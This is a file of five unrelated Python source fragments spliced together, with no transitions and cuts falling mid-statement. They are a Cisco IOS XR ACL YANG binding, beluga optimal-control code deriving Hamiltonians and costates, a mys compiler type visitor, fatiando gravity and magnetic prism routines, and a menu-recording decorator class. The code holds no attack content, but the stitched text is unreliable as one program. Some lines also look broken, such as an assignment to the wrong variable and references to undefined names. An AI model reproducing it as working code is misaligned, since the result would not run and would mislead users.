(([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)? .. attribute:: track_name The object tracking name for the next\-hop **type**\: str .. attribute:: vrf_name The VRF name of the next\-hop **type**\: str """ _prefix = 'ipv4-acl-cfg' _revision = '2015-11-09' def __init__(self): self.parent = None self.next_hop = None self.track_name = None self.vrf_name = None @property def _common_path(self): if self.parent is None: raise YPYModelError('parent is not set . Cannot derive path.') return self.parent._common_path +'/Cisco-IOS-XR-ipv4-acl-cfg:next-hop-1' def is_config(self): ''' Returns True if this instance represents config data else returns False ''' return True def _has_data(self): if not self.is_config(): return False if self.next_hop is not None: return True if self.track_name is
<gh_stars>1-10 """ Computes the necessary conditions of optimality using Bryson & Ho's method [1] Bryson, <NAME>. Applied optimal control: optimization, estimation and control. CRC Press, 1975. """ import functools as ft import itertools as it import simplepipe as sp import sympy import re as _re import numpy np = numpy from math import * import numba import beluga from beluga.utils import sympify from beluga.problem import SymVar import sympy as sym from sympy.utilities.lambdify import lambdastr from beluga.utils import keyboard def total_derivative(expr, var, dependent_vars=None): """ Take derivative taking pre-defined quantities into consideration dependent_variables: Dictionary containing dependent variables as keys and their expressions as values """ if dependent_vars is None: dependent_vars = {} dep_var_names = dependent_vars.keys() dep_var_expr = [(expr) for (_,expr) in dependent_vars.items()] dFdq = [sympy.diff(expr, dep_var).subs(dependent_vars.items()) for dep_var in dep_var_names] dqdx = [sympy.diff(qexpr, var) for qexpr in dep_var_expr] # Chain rule + total derivative out = sum(d1*d2 for d1,d2 in zip(dFdq, dqdx)) + sympy.diff(expr, var) return out def jacobian(expr_list, var_list, derivative_fn): jac = sympy.zeros(len(expr_list), len(var_list)) for i, expr in enumerate(expr_list): for j, var in enumerate(var_list): jac[i, j] = derivative_fn(expr, var) return jac def process_quantities(quantities): """Performs preprocessing on quantity definitions. Creates a new total derivative operator that takes considers these definitions. """ # logging.info('Processing quantity expressions') # TODO: Sanitize quantity expressions # TODO: Check for circular references in quantity expressions # Trivial case when no quantities are defined if len(quantities) == 0: yield {} yield [] yield total_derivative yield ft.partial(jacobian, derivative_fn=total_derivative) quantity_subs = [(q.name, q.value) for q in quantities] quantity_sym, quantity_expr = zip(*quantity_subs) quantity_expr = [qty_expr.subs(quantity_subs) for qty_expr in quantity_expr] # Use substituted expressions to recreate quantity expressions quantity_subs = [(str(qty_var),qty_expr) for qty_var, qty_expr in zip(quantity_sym, quantity_expr)] # Dictionary for substitution quantity_vars = dict(quantity_subs) # Dictionary for use with mustache templating library quantity_list = [{'name':str(qty_var), 'expr':str(qty_expr)} for qty_var, qty_expr in zip(quantity_sym, quantity_expr)] # Function partial that takes derivative while considering quantities derivative_fn = ft.partial(total_derivative, dependent_vars=quantity_vars) jacobian_fn = ft.partial(jacobian, derivative_fn=derivative_fn) yield quantity_vars yield quantity_list yield derivative_fn yield jacobian_fn def make_augmented_cost(cost, constraints, location): """Augments the cost function with the given list of constraints. Returns the augmented cost function """ def make_lagrange_mult(c, ind = 1): return sympify('lagrange_' + location + '_' + str(ind)) lagrange_mult = [make_lagrange_mult(c, ind) for (ind,c) in enumerate(constraints[location],1)] aug_cost_expr = cost.expr + sum(nu * c for (nu, c) in zip(lagrange_mult, constraints[location])) aug_cost = SymVar({'expr':aug_cost_expr, 'unit': cost.unit}, sym_key='expr') return aug_cost # yield aug_cost # yield lagrange_mult def make_aug_params(constraints, location): """Make the lagrange multiplier terms for boundary conditions.""" def make_lagrange_mult(c, ind = 1): return sympify('lagrange_' + location + '_' + str(ind)) lagrange_mult = [make_lagrange_mult(c, ind) for (ind,c) in enumerate(constraints[location],1)] return lagrange_mult def make_hamiltonian_and_costate_rates(states, costate_names, path_cost, derivative_fn): """simplepipe task for creating the hamiltonian and costates Workspace variables ------------------- states - list of dict List of "sympified" states path_cost - Object representing the path cost terminal Returns the hamiltonian and the list of costates """ ham = path_cost.expr + sum([lam*s.eom for s, lam in zip(states, costate_names)]) yield ham yield make_costate_rates(ham, states, costate_names, derivative_fn) def make_costate_names(states): return [sympify('lam'+str(s.name).upper()) for s in states] def make_costate_rates(ham, states, costate_names, derivative_fn): """Make costates.""" costates = [SymVar({'name': lam, 'eom':derivative_fn(-1*(ham), s)}) for s, lam in zip(states, costate_names)] return costates def sanitize_constraint_expr(constraint, states, location, prefix_map ): """ Checks the initial/terminal constraint expression for invalid symbols Also updates the constraint expression to reflect what would be in code """ if location not in prefix_map: raise ValueError('Invalid constraint type') pattern, prefix, _ = dict(prefix_map)[location] m = _re.findall(pattern,str(constraint.expr)) invalid = [x for x in m if x not in states] if not all(x is None for x in invalid): raise ValueError('Invalid expression(s) in boundary constraint:\n'+str([x for x in invalid if x is not None])) return _re.sub(pattern,prefix,str(constraint.expr)) def make_boundary_conditions(constraints, states, costates, cost, derivative_fn, location, prefix_map=(('initial',(r'([\w\d\_]+)_0', r"_x0['\1']", sympify('-1'))), ('terminal',(r'([\w\d\_]+)_f', r"_xf['\1']", sympify('1'))))): """simplepipe task for creating boundary conditions for initial and terminal constraints.""" prefix_map = dict(prefix_map) bc_list = [sanitize_constraint_expr(x, states, location, prefix_map) for x in constraints[location]] *_, sign = dict(prefix_map)[location] cost_expr = sign * cost #TODO: Fix hardcoded if conditions #TODO: Change to symbolic bc_list += [str(costate - derivative_fn(cost_expr, state)) for state, costate in zip(states, costates)] return bc_list def make_time_bc(constraints, bc_terminal): """Makes free or fixed final time boundary conditions.""" time_constraints = constraints.get('independent', []) if len(time_constraints) > 0: return bc_terminal+['tf - 1'] else: # Add free final time boundary condition return bc_terminal+['_H - 0'] def make_dhdu(ham, controls, derivative_fn): """Computes the partial of the hamiltonian w.r.t control variables.""" dhdu = [] for ctrl in controls: dHdu = derivative_fn(ham, ctrl) custom_diff = dHdu.atoms(sympy.Derivative) # Substitute "Derivative" with complex step derivative repl = {(d,im(f.func(v+1j*1e-30))/1e-30) for d in custom_diff for f,v in zip(d.atoms(sympy.AppliedUndef),d.atoms(Symbol))} dhdu.append(dHdu.subs(repl)) return dhdu import logging def make_control_law(dhdu, controls): """Solves control equation to get control law.""" try: print(controls) var_list = list(controls) logging.info("Attempting using SymPy ...") logging.debug("dHdu = "+str(dhdu)) ctrl_sol = sympy.solve(dhdu, var_list, dict=True) # raise ValueError() # Force mathematica except ValueError as e: # FIXME: Use right exception name here logging.debug(e) logging.info("No control law found") from beluga.utils_old.pythematica import mathematica_solve logging.info("Attempting using Mathematica ...") var_sol = mathematica_solve(dhdu,var_list) # TODO: Extend numerical control laws to mu's ctrl_sol = var_sol print('Control found') print(ctrl_sol) # ctrl_sol = sympy.solve(dhdu, controls, dict=True) # control_options = [ [{'name':str(ctrl), 'expr':str(expr)} # for (ctrl,expr) in option.items()] # for option in ctrl_sol] control_options = ctrl_sol return control_options def process_constraint(s, s_idx, states, costates, controls, ham, quantity_vars, jacobian_fn, derivative_fn, max_iter=5): """Processes one constraint expression to create constrained control eqn, constrained arc bc function""" print('Processing constraint: ',s.name) s_bound = sympy.sympify(s.name) s_q = sympy.Matrix([s.expr - s_bound]) control_found = False order = 0 found = False num_states = len(states) stateAndLam = [*states, *costates] stateAndLamDot = [s.eom*sympify('tf') for s in it.chain(states, costates)] stateAndLamDot = [s.eom for s in it.chain(states, costates)] costate_names = make_costate_names(states) ham_mat = sympy.Matrix([ham]) mult = sympy.symbols('_mu'+str(s_idx)) tangency = [] for i in range(max_iter): s_q = s_q.subs(quantity_vars) control_found = any(u in s_q.free_symbols for u in controls) if control_found: print('Constraint',s.name,'is of order',order) found = True ham_aug = ham_mat + mult*s_q # Augmented hamiltonian lamdot_aug = - mult * jacobian_fn(s_q, states) # Augmented costate equations in constrained arc # First solve for controls and then for mu dh_du = jacobian_fn(ham_aug, [*controls, mult]) u_sol_list = make_control_law(dh_du[1], controls) mu_sol_list = [] constrained_control_law = [] for u_sol in u_sol_list: mu_sol = make_control_law(dh_du[0].subs(u_sol), [mult]) control_law = {**u_sol, **mu_sol[0]} constrained_control_law.append(control_law) from beluga.utils import keyboard # keyboard() # constrained_control_law = make_control_law(dhdu, [*controls, mult]) constrained_costate_rates = make_costate_rates(ham_aug[0], states, costate_names, derivative_fn) break tangency.append(s_q[0]) s_q = jacobian_fn(s_q, stateAndLam)*sympy.Matrix([stateAndLamDot]).T order += 1 N_x = jacobian_fn(sympy.Matrix(tangency), states) # print(sympy.Matrix(N_x)) if order > 0: pi_list = sympy.symbols('pi'+str(s_idx)+':'+str(len(tangency))) corner_conditions = sympy.Matrix([pi_list]) * N_x else: pi_list = [] corner_conditions = sympy.Matrix([0]*len(costates)).T if not found: raise Exception("Invalid path constrant") return constrained_control_law, constrained_costate_rates, ham_aug[0], order, mult, pi_list, corner_conditions, tangency def process_path_constraints(path_constraints, states, costates, constants, controls, ham, quantity_vars, jacobian_fn, derivative_fn): s_list = [] mu_vars = [] for i, s in enumerate(path_constraints): u_aug, lamdot, ham_aug, order, mu_i, pi_list, corner_conditions, tangency = \ process_constraint(s, i, states, costates, controls, ham, quantity_vars, jacobian_fn, derivative_fn) s_list.append({'name': str(s['name']), 'expr': str(s['expr'].subs(quantity_vars)), 'unit': str(s['unit']), 'direction': s['direction'], 'control_law': u_aug, 'lamdot': lamdot, 'ham': ham_aug, 'order': order, 'mu': mu_i, 'pi_list': pi_list, 'corner': corner_conditions, 'tangency': tangency, 'bound_val': s['bound']}) mu_vars.append(mu_i) yield s_list yield mu_vars def make_parameters(initial_lm_params, terminal_lm_params, s_list): all_pi_names = [p['pi_list'] for p in s_list] params_list = [str(p) for p in it.chain(initial_lm_params, terminal_lm_params)] #, *all_pi_names)] parameters = sym.symbols(' '.join(params_list)) return parameters def make_constraint_bc(s, states, costates, parameters, constants, controls, mu_vars, quantity_vars, ham): num_states = len(states) costate_slice = slice(num_states, 2*num_states) ham_aug = s['ham'] corner_conditions = s['corner'] tangency = s['tangency'] tf_var = sympify('tf') y1m = sympy.symbols(' '.join('_'+str(_.name)+'_1m' for _ in it.chain(states, costates, [tf_var]))) y1m_x = sympy.Matrix([y1m[:num_states]]) y1m_l = sympy.Matrix([y1m[costate_slice]]) y1p = sympy.symbols(' '.join('_'+str(_.name)+'_1p' for _ in it.chain(states, costates, [tf_var]))) y1p_x = sympy.Matrix([y1p[:num_states]]) y1p_l = sympy.Matrix([y1p[costate_slice]]) y2m = sympy.symbols(' '.join('_'+str(_.name)+'_2m' for _ in it.chain(states, costates, [tf_var]))) y2p = sympy.symbols(' '.join('_'+str(_.name)+'_2p' for _ in it.chain(states, costates, [tf_var]))) y2m = sympy.Matrix([y2m]) y2p = sympy.Matrix([y2p]) u_m = sympy.symbols(' '.join('_'+str(_.name)+'_m' for _ in it.chain(controls, mu_vars))) u_p = sympy.symbols(' '.join('_'+str(_.name)+'_p' for _ in it.chain(controls, mu_vars))) if not hasattr(u_m, '__len__'): u_m = (u_m,) if not hasattr(u_p, '__len__'): u_m = (u_p,) def make_subs(in_vars, out_vars): return {k: v for k,v in zip(in_vars, out_vars)} subs_1m = make_subs(it.chain(states, costates, [tf_var], controls,
from ..parser import ast from .definitions import GenericType from .generics import TypeVisitor from .generics import add_generic_class from .generics import fix_chosen_types from .generics import replace_generic_types from .utils import BUILTIN_CALLS from .utils import BUILTIN_ERRORS from .utils import BYTES_METHODS from .utils import LIST_METHODS from .utils import NUMBER_TYPES from .utils import OPERATORS_TO_METHOD from .utils import REGEX_METHODS from .utils import REGEXMATCH_METHODS from .utils import SET_METHODS from .utils import STRING_METHODS from .utils import CompileError from .utils import InternalError from .utils import is_primitive_type from .utils import is_snake_case from .utils import make_integer_literal from .utils import raise_if_types_differs from .utils import split_dict_mys_type def mys_to_value_type(mys_type): if isinstance(mys_type, tuple): return tuple(mys_to_value_type(item) for item in mys_type) elif isinstance(mys_type, list): return [mys_to_value_type(item) for item in mys_type] elif isinstance(mys_type, dict): key_mys_type, value_mys_type = split_dict_mys_type(mys_type) return Dict(mys_to_value_type(key_mys_type), mys_to_value_type(value_mys_type)) elif isinstance(mys_type, set): return Set(mys_to_value_type(list(mys_type)[0])) else: return mys_type def format_value_type(value_type): if isinstance(value_type, tuple): if len(value_type) == 1: items = f'{format_value_type(value_type[0])}, ' else: items = ', '.join([format_value_type(item) for item in value_type]) return f'({items})' elif isinstance(value_type, list): if len(value_type) == 1: return f'[{format_value_type(value_type[0])}]' else: return '/'.join([format_value_type(item) for item in value_type]) elif isinstance(value_type, dict): raise Exception('not implemented') else: return value_type def intersection_of(type_1, type_2, node): """Find the intersection of given visited types. """ if type_1 is None: if is_primitive_type(type_2): raise CompileError(f"'{type_2}' cannot be None", node) else: return type_2, type_2 elif type_2 is None: if is_primitive_type(type_1): raise CompileError(f"'{type_1}' cannot be None", node) else: return type_1, type_1 elif type_1 == type_2: return type_1, type_2 elif isinstance(type_1, str) and isinstance(type_2, str): raise_if_types_differs(type_1, type_2, node) elif isinstance(type_1, tuple) and isinstance(type_2, tuple): if len(type_1) != len(type_2): return None, None else: new_type_1 = [] new_type_2 = [] for item_type_1, item_type_2 in zip(type_1, type_2): item_type_1, item_type_2 = intersection_of(item_type_1, item_type_2, node) if item_type_1 is None or item_type_2 is None: return None, None new_type_1.append(item_type_1) new_type_2.append(item_type_2) return tuple(new_type_1), tuple(new_type_2) elif isinstance(type_1, Set) and isinstance(type_2, Set): value_type_1, value_type_2 = intersection_of(type_1.value_type, type_2.value_type, node) return Set(value_type_1), Set(value_type_2) elif isinstance(type_1, Set) and isinstance(type_2, Dict): if type_2.key_type is not None or type_2.value_type is not None: raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) return type_1, type_1 elif isinstance(type_1, Dict) and isinstance(type_2, Dict): if type_1.key_type is None and type_2.key_type is not None: type_1.key_type = type_2.key_type elif type_1.key_type is not None and type_2.key_type is None: type_2.key_type = type_1.key_type key_value_type_1, key_value_type_2 = intersection_of(type_1.key_type, type_2.key_type, node) if type_1.value_type is None and type_2.value_type is not None: type_1.value_type = type_2.value_type elif type_1.value_type is not None and type_2.value_type is None: type_2.value_type = type_1.value_type value_value_type_1, value_value_type_2 = intersection_of(type_1.value_type, type_2.value_type, node) return (Dict(key_value_type_1, value_value_type_1), Dict(key_value_type_2, value_value_type_2)) elif isinstance(type_1, str): if not isinstance(type_2, list): return None, None elif type_1 not in type_2: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) else: return type_1, type_1 elif isinstance(type_2, str): if not isinstance(type_1, list): return None, None elif type_2 not in type_1: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) else: return type_2, type_2 elif isinstance(type_1, list) and isinstance(type_2, list): if len(type_1) == 0 and len(type_2) == 0: return [], [] elif len(type_1) == 1 and len(type_2) == 1: item_type_1, item_type_2 = intersection_of(type_1[0], type_2[0], node) return [item_type_1], [item_type_2] elif len(type_1) == 1 and len(type_2) == 0: return type_1, type_1 elif len(type_2) == 1 and len(type_1) == 0: return type_2, type_2 elif len(type_1) == 1 and len(type_2) > 1: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) elif len(type_2) == 1 and len(type_1) > 1: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) else: new_type_1 = [] new_type_2 = [] for item_type_1 in type_1: for item_type_2 in type_2: if isinstance(item_type_1, str) and isinstance(item_type_2, str): if item_type_1 != item_type_2: continue else: item_type_1, item_type_2 = intersection_of(item_type_1, item_type_2, node) if item_type_1 is None or item_type_2 is None: continue new_type_1.append(item_type_1) new_type_2.append(item_type_2) if len(new_type_1) == 0: type_1 = format_value_type(type_1) type_2 = format_value_type(type_2) raise CompileError(f"cannot convert '{type_1}' to '{type_2}'", node) elif len(new_type_1) == 1: return new_type_1[0], new_type_2[0] else: return new_type_1, new_type_2 else: raise InternalError(f"specialize types {type_1}, {type_2}", node) def reduce_type(value_type): if isinstance(value_type, list): if len(value_type) == 0: return ['bool'] elif len(value_type) == 1: return [reduce_type(value_type[0])] else: return reduce_type(value_type[0]) elif isinstance(value_type, tuple): values = [] for item in value_type: values.append(reduce_type(item)) return tuple(values) elif isinstance(value_type, str): return value_type elif isinstance(value_type, Dict): return {reduce_type(value_type.key_type): reduce_type(value_type.value_type)} elif isinstance(value_type, Set): return {reduce_type(value_type.value_type)} elif value_type is None: return None else: raise Exception("Bad reduce") class Set: def __init__(self, value_type): self.value_type = value_type def __str__(self): return f'Set({self.value_type})' class Dict: def __init__(self, key_type, value_type): self.key_type = key_type self.value_type = value_type def __str__(self): return f'Dict({self.key_type}, {self.value_type})' class ValueTypeVisitor(ast.NodeVisitor): """Find the type of given value. """ def __init__(self, context): self.context = context self.factor = 1 def visit_BoolOp(self, _node): return 'bool' def visit_JoinedStr(self, _node): return 'string' def visit_Compare(self, _node): return 'bool' def visit_BinOp(self, node): left_value_type = self.visit(node.left) right_value_type = self.visit(node.right) if self.context.is_class_defined(left_value_type): method = self.find_operator_method(left_value_type, OPERATORS_TO_METHOD[type(node.op)], node) return method.returns if right_value_type == 'string': return 'string' elif left_value_type == 'string': return 'string' else: return intersection_of(left_value_type, right_value_type, node)[0] def visit_Slice(self, node): lower = None upper = None step = None if node.lower: lower = self.visit(node.lower) if node.upper: upper = self.visit(node.upper) if node.step: step = self.visit(node.step) return lower, upper, step def visit_Subscript(self, node): value_type = mys_to_value_type(self.visit(node.value)) if isinstance(value_type, list): value_type = value_type[0] elif isinstance(value_type, tuple): index = make_integer_literal('i64', node.slice) value_type = value_type[int(index)] elif isinstance(value_type, Dict): value_type = value_type.value_type elif value_type == 'string': slice_type = self.visit(node.slice) if isinstance(slice_type, tuple): value_type = 'string' else: value_type = 'char' elif value_type == 'bytes': value_type = 'u8' else: raise Exception('todo') return value_type def visit_IfExp(self, node): return self.visit(node.body) def visit_Attribute(self, node): name = node.attr if isinstance(node.value, ast.Name): value = node.value.id if self.context.is_enum_defined(value): value_type = self.context.make_full_name(value) elif self.context.is_local_variable_defined(value): value_type = self.context.get_local_variable_type(value) elif self.context.is_global_variable_defined(value): value_type = self.context.get_global_variable_type(value) else: raise InternalError("attribute", node) else: value_type = self.visit(node.value) if self.context.is_class_defined(value_type): definitions = self.context.get_class_definitions(value_type) if name in definitions.members: value_type = definitions.members[name].type else: raise CompileError( f"class '{value_type}' has no member '{name}'", node) if isinstance(value_type, dict): value_type = Dict(list(value_type.keys())[0], list(value_type.values())[0]) elif isinstance(value_type, set): value_type = Set(list(value_type)[0]) return value_type def visit_UnaryOp(self, node): if isinstance(node.op, ast.USub): factor = -1 else: factor = 1 self.factor *= factor value = self.visit(node.operand) self.factor *= factor return value def visit_Constant(self, node): if isinstance(node.value, bool): return 'bool' elif isinstance(node.value, int): types = ['i64', 'i32', 'i16', 'i8'] if self.factor == 1: types += ['u64', 'u32', 'u16', 'u8'] return types elif isinstance(node.value, float): return ['f64', 'f32'] elif isinstance(node.value, str): return 'string' elif isinstance(node.value, bytes): return 'bytes' elif isinstance(node.value, tuple): if len(node.value) == 2: return 'regex' elif len(node.value) == 3: return 'char' else: raise Exception('todo') elif isinstance(node.value, complex): raise CompileError('complex numbers are not supported', node) elif node.value is None: return None else: raise Exception('todo') def visit_Name(self, node): name = node.id if name == '__unique_id__': return 'i64' elif name == '__line__': return 'u64' elif name == '__name__': return 'string' elif name == '__file__': return 'string' elif name == '__version__': return 'string' elif self.context.is_local_variable_defined(name): value_type = self.context.get_local_variable_type(name) return mys_to_value_type(value_type) elif self.context.is_global_variable_defined(name): value_type = self.context.get_global_variable_type(name) return mys_to_value_type(value_type) else: raise CompileError(f"undefined variable '{name}'", node) def visit_List(self, node): if len(node.elts) == 0: return [] item_type = self.visit(node.elts[0]) for item in node.elts[1:]: item_type, _ = intersection_of(item_type, self.visit(item), item) return [item_type] def visit_Tuple(self, node): return tuple(self.visit(elem) for elem in node.elts) def visit_Dict(self, node): if len(node.keys) > 0: return Dict(self.visit(node.keys[0]), self.visit(node.values[0])) else: return Dict(None, None) def visit_Set(self, node): if len(node.elts) == 0: return Set([]) item_type = self.visit(node.elts[0]) for item in node.elts[1:]: item_type, _ = intersection_of(item_type, self.visit(item), item) return Set(item_type) def visit_call_params_keywords(self, function, node): keyword_args = {} params = {param.name for param, _ in function.args} positional_params_names = [ param.name for param, _ in function.args[:len(node.args)] ] if node.keywords: for keyword in node.keywords: param_name = keyword.arg if param_name not in params: return None if param_name in positional_params_names: return None if param_name in keyword_args: return None keyword_args[param_name] = keyword.value return keyword_args def visit_call_params(self, function, node): """Returns true if given function can be called with given parameters, false otherwise. """ keyword_args = self.visit_call_params_keywords(function, node) if keyword_args is None: return False for i, (param, default) in enumerate(function.args): if i < len(node.args): try: intersection_of(self.visit(node.args[i]), param.type, node) except CompileError: return False else: value = keyword_args.get(param.name) if value is None: if default is
in prisms: if prism is None or ('density' not in prism.props and dens is None): continue if dens is None: density = prism.props['density'] else: density = dens x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.gyz(xp, yp, zp, x1, x2, y1, y2, z1, z2, density, res) res *= G * SI2EOTVOS return res def gzz(xp, yp, zp, prisms, dens=None): """ Calculates the :math:`g_{zz}` gravity gradient tensor component. .. note:: The coordinate system of the input parameters is to be x -> North, y -> East and z -> **DOWN**. .. note:: All input values in **SI** units(!) and output in **Eotvos**! Parameters: * xp, yp, zp : arrays Arrays with the x, y, and z coordinates of the computation points. * prisms : list of :class:`~fatiando.mesher.Prism` The density model used to calculate the gravitational effect. Prisms must have the property ``'density'``. Prisms that don't have this property will be ignored in the computations. Elements of *prisms* that are None will also be ignored. *prisms* can also be a :class:`~fatiando.mesher.PrismMesh`. * dens : float or None If not None, will use this value instead of the ``'density'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * res : array The field calculated on xp, yp, zp """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same length!") size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if prism is None or ('density' not in prism.props and dens is None): continue if dens is None: density = prism.props['density'] else: density = dens x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.gzz(xp, yp, zp, x1, x2, y1, y2, z1, z2, density, res) res *= G * SI2EOTVOS return res def tf(xp, yp, zp, prisms, inc, dec, pmag=None): """ Calculate the total-field magnetic anomaly of prisms. .. note:: Input units are SI. Output is in nT .. note:: The coordinate system of the input parameters is to be x -> North, y -> East and z -> Down. Parameters: * xp, yp, zp : arrays Arrays with the x, y, and z coordinates of the computation points. * prisms : list of :class:`~fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. *prisms* can also be a :class:`~fatiando.mesher.PrismMesh`. * inc : float The inclination of the regional field (in degrees) * dec : float The declination of the regional field (in degrees) * pmag : [mx, my, mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * res : array The field calculated on xp, yp, zp """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same length!") size = len(xp) res = numpy.zeros(size, dtype=numpy.float) # Calculate the 3 components of the unit vector in the direction of the # regional field fx, fy, fz = utils.dircos(inc, dec) if pmag is not None: if isinstance(pmag, float) or isinstance(pmag, int): mx, my, mz = pmag * fx, pmag * fy, pmag * fz else: mx, my, mz = pmag for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mag = prism.props['magnetization'] if isinstance(mag, float) or isinstance(mag, int): mx, my, mz = mag * fx, mag * fy, mag * fz else: mx, my, mz = mag x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.tf(xp, yp, zp, x1, x2, y1, y2, z1, z2, mx, my, mz, fx, fy, fz, res) res *= CM * T2NT return res def bx(xp, yp, zp, prisms, pmag=None): """ Calculates the x component of the magnetic induction produced by rectangular prisms. .. note:: Input units are SI. Output is in nT Parameters: * xp, yp, zp : arrays The x, y, and z coordinates where the anomaly will be calculated * prisms : list of :class:`fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. The ``'magnetization'`` must be a vector. * pmag : [mx, my, mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * bx: array The x component of the magnetic induction """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same shape!") if pmag is not None: mx, my, mz = pmag size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mx, my, mz = prism.props['magnetization'] x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.bx(xp, yp, zp, x1, x2, y1, y2, z1, z2, mx, my, mz, res) res *= CM * T2NT return res def by(xp, yp, zp, prisms, pmag=None): """ Calculates the y component of the magnetic induction produced by rectangular prisms. .. note:: Input units are SI. Output is in nT Parameters: * xp, yp, zp : arrays The x, y, and z coordinates where the anomaly will be calculated * prisms : list of :class:`fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. The ``'magnetization'`` must be a vector. * pmag : [mx, my, mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * by: array The y component of the magnetic induction """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same shape!") if pmag is not None: mx, my, mz = pmag size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mx, my, mz = prism.props['magnetization'] x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.by(xp, yp, zp, x1, x2, y1, y2, z1, z2, mx, my, mz, res) res *= CM * T2NT return res def bz(xp, yp, zp, prisms, pmag=None): """ Calculates the z component of the magnetic induction produced by rectangular prisms. .. note:: Input units are SI. Output is in nT Parameters: * xp, yp, zp : arrays The x, y, and z coordinates where the anomaly will be calculated * prisms : list of :class:`fatiando.mesher.Prism` The model used to calculate the total field anomaly. Prisms without the physical property ``'magnetization'`` will be ignored. The ``'magnetization'`` must be a vector. * pmag : [mx, my, mz] or None A magnetization vector. If not None, will use this value instead of the ``'magnetization'`` property of the prisms. Use this, e.g., for sensitivity matrix building. Returns: * bz: array The z component of the magnetic induction """ if xp.shape != yp.shape or xp.shape != zp.shape: raise ValueError("Input arrays xp, yp, and zp must have same shape!") if pmag is not None: mx, my, mz = pmag size = len(xp) res = numpy.zeros(size, dtype=numpy.float) for prism in prisms: if (prism is None or ('magnetization' not in prism.props and pmag is None)): continue if pmag is None: mx, my, mz = prism.props['magnetization'] x1, x2 = prism.x1, prism.x2 y1, y2 = prism.y1, prism.y2 z1, z2 = prism.z1, prism.z2 _prism.bz(xp, yp, zp,
import pandas as pd import numpy as np # makes multiple instances of the object available. from logistics.plugins.metaclass import Meta # imports all data types. from logistics.plugins.types import * # stores menu options over functions and class methods for listing. class Record(metaclass = Meta): # initializes the object and function it is decorating. def __init__( self, ) -> ReturnType: self.basic_menu : ListType = [] self.descriptive_menu : ListType = [] self.dictionary_menu : DictionaryType = {} self.individual_dict : DictionaryType = {} self.reset_dict : DictionaryType = {} self.poolsize : IntegerType = 0 self.stored_keys : ListType = [] self.print_val_dict : ListType = {} self.hidden_basic_menu : ListType = [] self.hidden_descriptive_menu : ListType = [] self.hidden_dictionary_menu : DictionaryType = {} self.contains_autoinit : BooleanType = False # option_name - stores the name for the config and display functions. # option_description - stores the description of the function for the config and display functions. # autoinit (True/False) - automatically initializes the function without storing into the dictionary menu. # print_val (True/False) - enables the print of function output. # - # creates and entry that is stored in a basic menu, descriptive menu and a dictionary menu. # DEFAULT: record.entry(option_name, option_description = '', autoinit = False, print_val = False). def entry( self, option_name : StringType = '', option_description : StringType = '', autoinit: BooleanType = False, print_val: BooleanType = False, ) -> StringDictionary: self.option_name = option_name self.option_description = option_description self.dict_name = self.option_name self.print_val = print_val self.individual_dict[self.dict_name] = {} self.reset_dict[self.dict_name] = {} self.print_val_dict[self.option_name] = self.print_val def record_function(func): if autoinit == False: self.dictionary_menu[self.option_name] = func self.basic_menu += [self.option_name] self.descriptive_function = str(self.option_name) + ' - ' + str(self.option_description) self.descriptive_menu += [self.descriptive_function] elif autoinit == True: self.hidden_dictionary_menu[self.option_name] = func self.hidden_basic_menu += [self.option_name] self.descriptive_function = str(self.option_name) + ' - ' + str(self.option_description) self.hidden_descriptive_menu += [self.descriptive_function] self.contains_autoinit = True def _wrap(*args, **kwargs): return func(*args, **kwargs) return _wrap return record_function # style ('decorator' - appends to a function.) # style ('function' - executes as a standalone function.) # method ('basic' - shows just record.entry stored names.) # method ('descriptive' - shows record.entry stored names and record.entry.option_description as a help menu.) # method ('dictionary' - creates a dictionary of record.entry names and the function they are appended on.) # return_option ('logs' - executes the function, but returns logs.) # return_option ('function' - shows logs, but returns the function.) # - # outputs saved menu as a function or decorator. # DEFAULT: record.display(style = 'decorator', method = 'dictionary', return_option = 